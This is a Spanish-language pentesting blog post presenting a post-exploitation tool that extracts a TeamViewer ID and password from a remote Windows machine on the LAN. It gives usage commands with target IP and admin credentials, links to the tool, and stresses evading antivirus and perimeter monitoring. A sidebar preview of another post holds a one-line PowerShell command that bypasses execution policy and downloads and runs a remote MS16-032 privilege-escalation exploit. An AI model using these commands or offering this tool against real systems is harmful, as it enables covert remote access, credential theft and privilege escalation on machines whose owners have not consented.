Obtener el ID y password de teamviewer de una maquina en la LAN


La herramienta de la que hablaré en este post obtiene el id y password de teamviewer en un proceso de post explotación. Nació de la necesidad que tuve durante un pentest donde el escenario era el siguiente:


Obtuve shell remota en una máquina donde podía ejecutar comandos pero no tenía acceso a entorno gráfico, la máquina no tenía activado escritorio remoto, la seguridad era fuerte, antivirus instalado y actualizado el cual no pude desactivar por linea de comandos, sistema perimetral de seguridad, reglas de filtrado de tráfico en el utm el cual no sabía que tanto estaba siendo monitoreado.


La shell la obtuve sin ejecutar ningún exploit, la idea era no ejecutar nada sospechoso que pudiera disparar alarmas en el antivirus instalado localmente ni en el sistema de seguridad perimetral ya que el pentest se daría por terminado si algún comportamiento malicioso era detectado


La máquina tenía instalado teamviewer, si lograba de alguna manera leer desde línea de comandos el id y contraseña podría tener acceso a la máquina




Descargué ejecuté varios scripts de internet que describían que podían leer dicho Id y contraseña de teamviewer pero no tuve éxito


Programé entonces una herramienta que lee el id y password de teamviewer ejecutándose en una máquina remota en la cual se tiene ejecución de comandos, el teamviewer va a estar ejecutándose en la sesión gráfica de un usuario x, no importa si el usuario que está ejecutando teamviewer es diferente del usuario con el que nosotros estamos ejecutando comandos la herramienta será capaz de leer el id y password , el plan es luego agregarle más funcionalidad a la herramienta.


Para ejecutar basta con descargar los dos archivos get_Team_Pass.exe y hook.exe del repositorio de github

https://github.com/kr1shn4murt1/get_Team_Pass

se abre un cmd en la carpeta donde se descargaron los archivos

Al programa debe pasarsele como parametros el usuario y contraseña de un usuario con permisos administrativos en la máquina remota:

get_Team_Pass.exe -t 192.168.175.136 -u administrator -p Secreta2014

Si las credenciales son de un usuario de dominio dicho dominio se especifica en el parámetro -d
get_Team_Pass.exe -t 192.168.175.136 -u administrator -p Secreta2014 -d domain


Al ejecutar el programa nos entrega el id y password de teamviewer
-t es la ip de la maquina objetivo , -u el usuario , -p la contraseña


 get_Team_Pass.exe -t 192.168.175.136 -u administrator -p Secreta2014





Link del video donde se puede ver funcionando la herramienta

https://goo.gl/VhWF4g

Link de descarga con codigo fuente incluido para los que no quieren usar el .exe
 sino los scripts en python
https://github.com/kr1shn4murt1/get_Team_Pass

Con estos datos sin necesidad de instalar software adicional, sin usar payloads más intrusivos y que generen alarmas en antivirus u otros sistemas de protección se cumple el objetivo de obtener el id y password de teamviewer con lo que podemos conectarnos a la maquina y obtener acceso al entorno gráfico

Comentarios

  1. Plínio27 de febrero de 2020, 9:25 a.m.

    Please help me. After executing an error message is displayed:

    This version of c: \ Temp \ get_Team_Pass.exe is not compatible with a version of Windows that is running. Check your computer's system information if you need an x86 (32-bit) or x64 (64-bit) version of the program and contact the software vendor.

    ResponderBorrar
    Respuestas
    1. kr1shn4murt19 de junio de 2020, 12:14 a.m.

      I'm sorry man, I hadn't seen this messsage before
      please download the latest release and test it
      https://github.com/kr1shn4murt1/get_Team_Pass/releases

      Borrar

Publicar un comentario

Entradas más populares de este blog

Activar mensajero en Windows 7 y 2008

Imagen
Saludos, El mensajero es un servicio que permite enviar mensajes entre dos equipos con sistema operativo windows, para usarlo primero se debe activar tanto en el equipo origen como en el equipo destino y luego se utiliza digitando en el prompt o en inicio - ejecutar el comando: net send [equipo de destino] [mensaje a enviar] , o en vez de equipo de destino se puede reemplazar por "*" si es a toda la red, los mensajes aparecerán en los equipos de destino como una ventana  pop up, veremos la manera de emular su funcionamiento en windows 7 y 2008 de donde fué eliminado dicho servicio. Este se activa en Windows XP y 2003 en el menú panel de control - herramientas administrativas - servicios, allí se busca el mensajero, se le da click derecho - propiedades y luego de la lista desplegable de tipo de inicio se le pone inicio automático, luego click al botón iniciar y listo, ejecutando el procedimiento en dos equipos ya se puede enviar mensajes entre ellos. Por r
Leer más

La forma mas sencilla de escalar privilegios en windows - easiest privilege escalation on windows

La forma mas sencilla de escalar privilegios en windows, copiar este comando en una ventana de cmd: powershell -ExecutionPolicy Bypass -command "IEX (New-Object Net.WebClient).DownloadString(\"https://raw.githubusercontent.com/kr1shn4murt1/PowerShell-Suite/master/Invoke-MS16-032.ps1\"); Invoke-MS16-032" @FuzzySec Escalar privilegios es basicamente pasar de ser un usuario normal en el sistema operativo para convertirse en un usuario administrador    
Leer más